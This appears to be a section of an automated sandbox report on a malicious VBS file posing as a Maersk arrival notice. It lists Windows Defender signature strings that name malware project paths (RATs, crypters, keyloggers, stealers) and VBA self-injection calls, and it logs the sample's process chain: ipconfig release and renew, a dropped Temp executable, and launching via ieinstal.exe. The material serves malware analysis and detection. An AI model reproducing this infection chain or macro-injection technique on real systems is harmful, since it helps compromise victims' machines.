Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: \\cryptor.+\\Project1\.vbp
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	Binary or memory string: \AYO.vbp
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	Binary or memory string: C:\Archivos de programa\Microsoft Visual Studio\VB98\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: ^AJ:\MASTER\ad_compiler\moy.exe\balvanka\ZAG.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 3..+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\Documents and Settings\\Administrador\\Desktop\\LOAD.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: E@.+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: .vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: 3.\\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: 2*\AC:\y0Za8\wpad\wpad.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: B=:\\.+\\Indetectables RAT.+p.+is.+\\SIN WINSOCK\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: MH.+:\\Documents and Settings\\User\\Desktop\\.pia de.fab\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	Binary or memory string: cMicroLab.vbp
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: TroyanExplore\Instalar.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: VQ.+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\backup 20##11\\bank\\Pharming\\Projeto VB\\Project1.NET\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: B*\AF:\learn\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: .+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	Binary or memory string: nh AV\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	Binary or memory string: HKnamemom.vbpa
Source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: \Simplesso.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: <\ALLROUND STEALER\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	Binary or memory string: -powerword\PowerWord.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 4/.+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: \Bonus 1.5.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Cactilio - Joiner.+\\Src\\Stub\\YvcGVCI.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 6@*\AC:\server\Tarantula.vbp
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: hider\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: ysp\ysp.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: >\YPKISS~1\ULTIMA~1\ULTIMA~1.VBP
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: <7.+:\\.+\\Desktop\\Codes\\Registro dll\\RegistroDll.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: \|C:\Documents and Settings\Diego\Desktop\gold hack\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: fzx9823.vbp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: 72C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: ,'.+:\\afron\\Loader.*VB.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: .+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: `@*\AC:\PiElcestial-udtools-net-indetectables.vbp

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe 'C:\Windows\System32\ipconfig.exe' /renew
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.237.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe /q WD
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe 'C:\Windows\System32\ipconfig.exe' /renew	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.237.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe /q WD	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582F118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,

45_2_00007FF7B582F118

Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AnomalyInfo(Key, UnbiasedTime) VALUES (?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(13, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT DISTINCT TableName FROM AnomalyTables;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileHashes WHERE FileHashes.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM RansomwareDetections;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM NetworkIpFirewallRules;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime, UpdateTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM FileLowFiAsync;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID from RecordIdentifier WHERE Key = ? AND RecordTimeStamp = ? ;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(14, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(6, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemFileCache;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SdnEx;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID from File WHERE SHA1 = ? ;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemRegistryCache;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
